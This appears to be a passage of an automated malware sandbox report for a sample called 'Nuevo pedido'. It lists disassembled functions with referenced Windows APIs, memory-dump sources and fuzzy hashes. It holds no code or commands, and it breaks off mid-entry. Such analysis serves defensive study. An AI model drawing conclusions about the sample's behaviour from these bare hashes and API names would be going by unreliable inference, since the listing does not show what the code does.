Instruction Fuzzy Hash: 2A51B831B002159FDB04DF69C844B6ABBE7EF88394F04846AEA49CB355DBB1DC41CB91

Function 02F73CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02F73CCD
Xbq, xrefs: 02F73CF6

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 31963d2692bd7321c19d03badb43ef12bd18bfeeb4ebf93bcc642e263288df0e
Instruction ID: 335299d0ec19f3bd374e3cc14f9233f24d48aadee3b1efd5e55d074830cb6f54
Opcode Fuzzy Hash: 31963d2692bd7321c19d03badb43ef12bd18bfeeb4ebf93bcc642e263288df0e
Instruction Fuzzy Hash: 68315C32F443299BDF184679859437EAAE6ABC4280F0848BFEA07C3380DBB5CC45E751

Function 02F78EF8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

$^q, xrefs: 02F78FB4
$^q, xrefs: 02F78FD7

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: eea740af2044ac9c8399b20e4af34596160efa7ca4139021cf7e44d4283b7e75
Instruction ID: 835a68f2719e1a65a22b12450c82b426d5e835f4b8ebf8b6a9928eca211e46ae
Opcode Fuzzy Hash: eea740af2044ac9c8399b20e4af34596160efa7ca4139021cf7e44d4283b7e75
Instruction Fuzzy Hash: 0C31CF31B001158FCB298B79D898BBE77A7BB847D0B14086BF112CB292EF29CC81D755

Function 02F70C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02F70F19

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 83f3a60ffb3118de15e6109ce77be0ff79a97b2bfcaf87d5c04154c2c3d8679c
Instruction ID: 4357f98ddbe0241f52ce0765a2d05f837301d1fe918ee397b40aa918ca8d781e
Opcode Fuzzy Hash: 83f3a60ffb3118de15e6109ce77be0ff79a97b2bfcaf87d5c04154c2c3d8679c
Instruction Fuzzy Hash: 38520934D41219CFCB55DF65EA88A8DBBB2FB48301F5085AAD409AB354DB746EC5CF80

Function 02F70CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02F70F19

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 13c8f2e8ff328f7bacc7d1544e40aba9b96313fb05d0f61aed1cddef537865a6
Instruction ID: 5cf1cb29649906b2c4c94ee41a42a2e4bd3b6ac1223247a9718880a3e2f8749c
Opcode Fuzzy Hash: 13c8f2e8ff328f7bacc7d1544e40aba9b96313fb05d0f61aed1cddef537865a6
Instruction Fuzzy Hash: B852F974D41219CFCB54DF65EA88A8DBBB2FB48301F5085AAD409AB354DB746EC5CF80

Function 06D8AFE0 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17cf08b3179c6cd9aa1e94a0b2da3cdfa1ba93381ad5058756baa045cc8a7763
Instruction ID: 45d12fd1b52891eed310609fca0256f037de23a64cb551e94f4cd2b41fc232e9
Opcode Fuzzy Hash: 17cf08b3179c6cd9aa1e94a0b2da3cdfa1ba93381ad5058756baa045cc8a7763
Instruction Fuzzy Hash: 4BA16CB4E002498FDB54EFA9C988AAEBBF5FF48304F15845AE455AB351C734E940CBA1

Function 073714A4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 07371970

Memory Dump Source

Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 348c08f0bf7acf73247669a4d047cd083963dc493176a65a59819a9a1aa1606e
Instruction ID: 426d3b6197eff17d1dda5832042dcb7ec7bb70d79b26121d5e1edafd22719ccb
Opcode Fuzzy Hash: 348c08f0bf7acf73247669a4d047cd083963dc493176a65a59819a9a1aa1606e
Instruction Fuzzy Hash: 233134B190124CDFDB24DF99C984BCDBBF5AF49304F208059E408BB290D774A945CF95

Function 073718E3 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 07371970

Memory Dump Source

Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: bfe59ab08074ac6c42d056687a925132ce98e144fa3ed638cb683f2c7060ec76
Instruction ID: 2e76503f17e10ffefbbe521b2948c9135b9a264b67e5599c3c4ac61ce131c8ce
Opcode Fuzzy Hash: bfe59ab08074ac6c42d056687a925132ce98e144fa3ed638cb683f2c7060ec76
Instruction Fuzzy Hash: D43112B1D01248DFDB24CF99C984BCEBBF5AF49304F248059E408BB294D775A945CF95

Function 06D87FCC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D89166,?,?,?,?,?), ref: 06D89227

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 16ab807f5c085dbdc8cab8f288a1fe92b1e0eb6415ecfa60b8f808b99cfbdeac
Instruction ID: 00390ca96299e2c2b1ed3fd668f845ddd11306c2b1506d83b988cd6a08786707
Opcode Fuzzy Hash: 16ab807f5c085dbdc8cab8f288a1fe92b1e0eb6415ecfa60b8f808b99cfbdeac
Instruction Fuzzy Hash: 9E21E4B5900208DFDB10DF9AD984AEEFBF9FB48310F14841AE955A7350D379A950CFA4

Function 06D89199 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D89166,?,?,?,?,?), ref: 06D89227

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 585be83ec19b7daf53bb3d57f72d58f27d9762098c20573fa971ab38ff8f4b53
Instruction ID: 7ba9fc59ae12e7e521a86fd580b1c4d5a633334d535f3526d70f66de71a72a47
Opcode Fuzzy Hash: 585be83ec19b7daf53bb3d57f72d58f27d9762098c20573fa971ab38ff8f4b53
Instruction Fuzzy Hash: 0621E4B5900258DFDB10DF9AD984AEEFBF4FB48310F14801AE958A7310D378A944CFA4

Function 06D8B208 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06D88245,?,?,?), ref: 06D8B28D

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 89506518b6e9e29cc15f20efc6d4ea3da0d1299db861910ffe341c6e8d8a2fa9
Instruction ID: 5ebf6ff8dca6d687e3444e7f38eeb55987b6246d87b6a0fd45edb1b484895b82
Opcode Fuzzy Hash: 89506518b6e9e29cc15f20efc6d4ea3da0d1299db861910ffe341c6e8d8a2fa9
Instruction Fuzzy Hash: EC21EFB58013499FCB20DF9AD888ADEFBB5BB48314F14842EE859A7200D375A544CBA4

Function 06D89894 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06D8AE60,041042A8,031B3570), ref: 06D8AEF1

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 442f5bc5a3b75664f3a3b51d06198e0a66ccf4e55c172ff8610c00f821aaa23c
Instruction ID: 370da365d613a435a172ebd91afed0211dc6b1bfd65f73800aced44dfba5fec9
Opcode Fuzzy Hash: 442f5bc5a3b75664f3a3b51d06198e0a66ccf4e55c172ff8610c00f821aaa23c
Instruction Fuzzy Hash: 432129B1D042198FDB54DF9AC848BEEFBF5EB88310F14842AD454A7350D774A944CFA5

Function 06D8AE79 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06D8AE60,041042A8,031B3570), ref: 06D8AEF1

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: b433677a6506ced921b85e988560193488bd4b50637913eabb557fb419646f47
Instruction ID: cb4530be945b35bcad00b57d1f1445273706157b565e6a769e65b5d1481edbfe
Opcode Fuzzy Hash: b433677a6506ced921b85e988560193488bd4b50637913eabb557fb419646f47
Instruction Fuzzy Hash: 4D2115B1D002198FDB14DF9AC844BEEFBF4EB88320F14842AD458A7250D774A944CFA5

Function 06D87D8C Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06D88245,?,?,?), ref: 06D8B28D

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 599d633804bcfd91ae85b6f77e4be1e5305141d32383856a27790294e2d16774
Instruction ID: d83024261551d6f008b186b8af0ec43cc94ed3907f18bef6e32d2b0281611d13
Opcode Fuzzy Hash: 599d633804bcfd91ae85b6f77e4be1e5305141d32383856a27790294e2d16774
Instruction Fuzzy Hash: CE21F3B5D013099FCB20DF9AD888BDEFBB5FB48310F10842EE859A7200C375A944CBA4

Function 06D89FC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06D8A025

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 939c8d5f7110d35387c64b61862937c5ee4b61f8aa4e4add8282314901a7363d
Instruction ID: 4517e3d3f79355716901020241954ee6ba7cd59c68858488b75c9f42744278f1
Opcode Fuzzy Hash: 939c8d5f7110d35387c64b61862937c5ee4b61f8aa4e4add8282314901a7363d
Instruction Fuzzy Hash: AF1145B48003489FCB20DF9AD949BCEFFF8EB48324F20845AE459A3250C735A544CFA5

Function 06D89828 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06D8A025

Memory Dump Source

Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b4a8baf6e942ed361b04fccd586fdc3bbf6f1038489c5b06fe3ac4dcdc892b41
Instruction ID: a4a3aaaef81eb7d1127b850c1ff49caba0f5a5e1b0f3bf11a46061dc04a6009a
Opcode Fuzzy Hash: b4a8baf6e942ed361b04fccd586fdc3bbf6f1038489c5b06fe3ac4dcdc892b41
Instruction Fuzzy Hash: 811142B08003488FCB20EF9AC548BDEFBF8EB48324F24845AE559A7310D375A940CFA4

Function 07370FA3 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 07371005

Memory Dump Source

Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: fb9960ee8f077ecec01994602eb64243e8083c6470b46c8b80af37a56c551f0a
Instruction ID: fddfbaf6fcd562b1f0f302d7a902a16baaeca8757b31a1dd88dc28d453d22c37
Opcode Fuzzy Hash: fb9960ee8f077ecec01994602eb64243e8083c6470b46c8b80af37a56c551f0a
Instruction Fuzzy Hash: 031122B1D002898FCB20CF9AD448ACEFBF4AB48324F20855AE469A7250C338A540CFA5

Function 07370FA8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 07371005

Memory Dump Source

Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 62ce11119f88f473a17b1ab474a1ddef2df10fb6ee184d3170fe80221d64962a
Instruction ID: 693c9b71515884f3c27bc9a7e8cf7a371b33c8ec9f80ff317734ff1aee351b65
Opcode Fuzzy Hash: 62ce11119f88f473a17b1ab474a1ddef2df10fb6ee184d3170fe80221d64962a
Instruction Fuzzy Hash: 221112B5C00249CFCB20DF9AD444BDEFBF4EB48324F10842AD458A3210D379A544CFA5

Function 02F7E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc3758418413e31ac174905b6b301b86b49c8ec78d592fc9a53850220f07970
Instruction ID: 0d6d56da97414fca57c1ce7b4fcb2aecc8e2f13a704d2f82143ec65caf445494
Opcode Fuzzy Hash: 4fc3758418413e31ac174905b6b301b86b49c8ec78d592fc9a53850220f07970
Instruction Fuzzy Hash: 05129C358E324B8FE2413F30E6BC56AFB62FB1F7A3745AE01E11BC9445DB7114688A61

Function 02F79A10 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a1447c653792ffc3fe33064c2f263cc5f82160ce8c802bebcda388ac9bd9f1
Instruction ID: ac42cee8f3d6fbd6fbd8dac7bc92b30cb1eb4242d48431bc67e882eb8c5870d0
Opcode Fuzzy Hash: 71a1447c653792ffc3fe33064c2f263cc5f82160ce8c802bebcda388ac9bd9f1
Instruction Fuzzy Hash: 0B814731A016059FCB11CF6CC880AAABBB6FF853A4B14C667EA18D7355D731F951CBA0

Function 02F780D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b54973130019969946659d32256aaa2bf18531f9ed54d445946d5b44cf0f1ad
Instruction ID: 412094ee2b7f8ac516007b9e8dc18032bf1689aea36ed7160c661f4b62dc823b
Opcode Fuzzy Hash: 8b54973130019969946659d32256aaa2bf18531f9ed54d445946d5b44cf0f1ad
Instruction Fuzzy Hash: B3717C34B006058FCB14DF68C888A6E7BE6BF997C5B1500AAEA02DB370DB70DC41DB60

Function 02F7D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba3be57fb15f4b1e6befd630ce496b3d750d75d49dbbc1090bc2f9ea3aaf96f
Instruction ID: fae5639f7202c6b996e092f172501f69f0cc18e71e3f5b58b420313c6dfb9fe5
Opcode Fuzzy Hash: 6ba3be57fb15f4b1e6befd630ce496b3d750d75d49dbbc1090bc2f9ea3aaf96f
Instruction Fuzzy Hash: 82518374E01218DFDB44DFAAD5849DDBBF2BF89300F20816AE809AB364DB31A945CF50

Function 02F741A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232ab242e93a26c6ba2857cc986a7e82fd62f5f2b3a9b16845276000c84a1e71
Instruction ID: 71b9d7c978e04ce1949646b594d8024de360cabe3978555e977ee12cb4e1a6e6
Opcode Fuzzy Hash: 232ab242e93a26c6ba2857cc986a7e82fd62f5f2b3a9b16845276000c84a1e71
Instruction Fuzzy Hash: 6F51A875E01208CFCB48DFA9D58499DBBF2FF89314B209169E805AB364DB35AD42CF51

Function 02F7A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb5e6de3d6c4f547047d9d9b900324b5af64e7b215ca92aec9031ac9f68f0e5
Instruction ID: c4fbf05a8222ebdb85d0c90cc62d18fdaf2b0afec591ec25230721d380a319a9
Opcode Fuzzy Hash: 7eb5e6de3d6c4f547047d9d9b900324b5af64e7b215ca92aec9031ac9f68f0e5
Instruction Fuzzy Hash: 1841A231A04249DFCF11CFA8C944B9EBFB2FF49394F068566EA159B2A1D332E914CB50

Function 02F76FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed76baabe92eff7a504a06804e2aefdd1f8c23dce778e2520efd5458a7a98e32
Instruction ID: a13b931e0402d529b3e9ea56ca62901f0ceab96280e9c74e3d39da6a59b44adb
Opcode Fuzzy Hash: ed76baabe92eff7a504a06804e2aefdd1f8c23dce778e2520efd5458a7a98e32
Instruction Fuzzy Hash: BF41FE31A002489FCB149F64C804BAEFBB2FB84344F04846AE905DB252DB79DD95CFA1

Function 02F75658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d37ec0c8845dd013b9c96cf5eec1b09a4cd77e5549e27eec53a74f91908fa65
Instruction ID: c7391bf1deb632b529b818d490f85497869226912822322124245f829961844e
Opcode Fuzzy Hash: 8d37ec0c8845dd013b9c96cf5eec1b09a4cd77e5549e27eec53a74f91908fa65
Instruction Fuzzy Hash: EF318F31A0110EDFCF119FA5D854AAF7BA3FB88685F448429FE158B250CB35CD62CB90

Function 02F7F85C Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cfa2d2c247a39d926f37e7fb5934b1fd7d675f75ee29033d2680f384f3e66a
Instruction ID: 95db4f5a03390eb5ec1a6332e9d6ec3679184ab6ae4e5384d25cd6bc42cf536f
Opcode Fuzzy Hash: 74cfa2d2c247a39d926f37e7fb5934b1fd7d675f75ee29033d2680f384f3e66a
Instruction Fuzzy Hash: D841EF74E05328CFCB64DF74D858BADBBB2AF4A304F1045AAD40EA7240DB349A81CF01

Function 02F78380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0119ad9ee83de13a5ce978e3f05a874e725a2563f770b9b3706fced3d7d777
Instruction ID: d66df0777f00f412f69eb4a37be0d139329c5c96f2821b3d54052fe4395d2878
Opcode Fuzzy Hash: 7a0119ad9ee83de13a5ce978e3f05a874e725a2563f770b9b3706fced3d7d777
Instruction Fuzzy Hash: 3321B031B002058BDB245E75C65C73E7697AFC87D8F14847AD606CB798EBA5CC42E381

Function 02F762F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910bbb0246a9c04f70284be4e181dbaec167d7d8b27f33ec048bd6d9bb741a9e
Instruction ID: 5c34b1e1f097d45052fdc7e4be3c3c771b02292025ef1f77f3c2249ec6ef8584
Opcode Fuzzy Hash: 910bbb0246a9c04f70284be4e181dbaec167d7d8b27f33ec048bd6d9bb741a9e
Instruction Fuzzy Hash: 0921F235B019158FC7269B2AC45492EB7A7FFC97D5709846AEA1ACB394CF30DC02CB80

Function 02F728F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6153596e7b2a2bf0a9442be2434066f25251e71d232fc6e93588a12cebce434
Instruction ID: a412855d321004499d6de52e9692075192f55792778d2a70b5e84794f1b3d278
Opcode Fuzzy Hash: e6153596e7b2a2bf0a9442be2434066f25251e71d232fc6e93588a12cebce434
Instruction Fuzzy Hash: 48218E75E001059FCB14DF34C490AAE77B5EB9D2A4B14805AE94A9B340DB38EE83CBD2

Function 02E9D118 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138410317.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e9d000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8be96f248633910ebc81d8dd915a147e8b3db373302e68b011ad054309934d2
Instruction ID: e535fb550f78738817e851bfcf29ad953374bf5b13f383c5ac2f60f785bb4d50
Opcode Fuzzy Hash: d8be96f248633910ebc81d8dd915a147e8b3db373302e68b011ad054309934d2
Instruction Fuzzy Hash: D221F272684200DFDF05EF15DDC4B26BBA5FB88318F20C56EE8094B256C37AD446CA71

Function 02F75649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d9b10a6370102b054f55d4156b3c22804401af009f18d4924af0c4588683468
Instruction ID: 9e504e56fae4f510ff34334114726dc67d15383711d71503e4f8a9752f39a4e7
Opcode Fuzzy Hash: 1d9b10a6370102b054f55d4156b3c22804401af009f18d4924af0c4588683468
Instruction Fuzzy Hash: BC21C231A0524DCFCB119F64D848BAA7BA2FB94694F44846AEA058F344CB34CD62CBA0

Function 02F74285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56fe4d6e12f6bc27ef2573ebbbfb33bb0b3c785723ad376eb468ac76534a8a24
Instruction ID: b966598e2ab8cd8606e8660343767ae9b1087c071e06cac56976e22632bc3c06
Opcode Fuzzy Hash: 56fe4d6e12f6bc27ef2573ebbbfb33bb0b3c785723ad376eb468ac76534a8a24
Instruction Fuzzy Hash: 1B31B578E01208CFCB44DFA9E58889DBBB2FF49305B204069E819AB324DB35AD85CF01

Function 02F79761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055fd289f4ed021ead795d9abe0c18bbd14301d6aee02e1761b48466baf5af1b
Instruction ID: 8b87dfcaf5fc307c6c9b65c68d27afc8c98b2d335693211030506af48df82c5e
Opcode Fuzzy Hash: 055fd289f4ed021ead795d9abe0c18bbd14301d6aee02e1761b48466baf5af1b
Instruction Fuzzy Hash: DF218B30E0124D9FCB05CFB5D550AEEBFB6EF49245F14846AE511E6390DB34D981CB20

Function 02F7F8EA Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea62a16fc3df535a2e708be45619c80b02ce9df95300fcc7cf4ebf4c11adf8e
Instruction ID: 5d6dfd2d0eaccb51987b2348118375ebe385563f8d9b5ca3242579de7783910d
Opcode Fuzzy Hash: 0ea62a16fc3df535a2e708be45619c80b02ce9df95300fcc7cf4ebf4c11adf8e
Instruction Fuzzy Hash: E131EE74E05319CFCB64DF64D968BADBBB2AF49300F1045AAD50AA7250DB745A81CF12

Function 02F7AEF0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

